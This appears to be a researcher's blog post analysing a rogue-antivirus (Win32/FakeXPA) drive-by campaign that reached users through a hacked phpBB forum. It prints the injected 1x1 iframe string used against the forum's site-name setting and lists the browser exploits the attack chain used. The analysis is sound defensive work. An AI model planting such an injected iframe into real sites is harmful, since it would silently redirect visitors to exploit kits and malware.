(often known as "Antivirus 2009").

One night while browsing, a message box popped up asking me to do a "security scan". As a researcher, I wouldn't let this pass me by. After going through my opened tabs I narrowed down the culprit to a forum I had open at the time.

"View Source" showed a 1x1 pixel IFRAME pointing to hxxp://***.info/users/***/1.php

The position of this IFRAME is a little strange. It appears several times on the page, and each time right after the title of the forum. It appeared to me that this was some kind of variable being replaced with malicious content. It even breaks the HTML when this variable is not used inside a <title> tag:

iframe source

After a crash course on phpBB, I found out that phpBB stores its entire configuration in the database. In our case, it seems that the following string is concatenated to the content of config_value "sitename":

</title><iframe src=http://***.info/users/***/1.php width=1 height=1></iframe>

I ran some web searches, and found out there are at least about 300 sites containing the same injected IFRAME at the same location.

While I don't have concrete evidence, my bet is that all these sites were attacked by an automated SQL-injection attack.

Now that we found the culprit, I opened up my virtual machine, and dropped the URL in. Sure enough, after several seconds, a dialog popped up and IE process crashed. It was our old friend Win32/FakeXPA.

Digging through the network capture was fun. The attack seemed to be browser specific. (On my initial visit, I only got a message box asking me to manually download "security scan program"). Here's a rough summary of the attack observed in the virtual machine:

  1. The IFRAME redirects the user through 2 HTTP redirections
  2. The final destination contains a heavily obfuscated Javascript. The script contains 9 different "attack recipes" and simply loops through them until one of them succeeds.
  3. If any of the exploits succeeds, a small downloader is downloaded and launched.
  4. This downloader queries the central server for additional instruction. In my trial, it was instructed to download the installer/downloader for Win32/FakeXPA.

    HTTP traffic
  5. Curiously, the Win32/FakeXPA installer still asks for user consent to continue the installation. Add to that the fact that the installer contains a shield, a Microsoft Windows logo at the corner, and the "terms and conditions" points to a site with clean design. The whole "experience" may appear somewhat legitimate to the end user.

    Win32/FakeXPA Screenshot

In the multi-exploit javascript, the following exploits were used:

  • MDAC remote code execution (MS06-014)
  • ShockwaveFlash.ShockwaveFlash.9 exploit
  • WebViewFolderIcon setSlice() exploit (MS06-057)
  • Msdds.dll exploit (MS05-052)
  • Microsoft Works exploit (MS08-052)
  • Creative Software AutoUpdate Engine exploit
  • Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow
  • Ourgame GLWorld GLIEDown2.dll exploit
  • DirectAnimation.PathControl buffer overflow (MS06-067)  

So there you have it, this looks like a fairly complex malware distribution operation.

One day later, when I tried the same exploit destination, it had already stopped serving malicious content. When I launched the first stage downloader, the control server stopped giving instructions to download the second stage installer. Strange…

--Yuhui Huang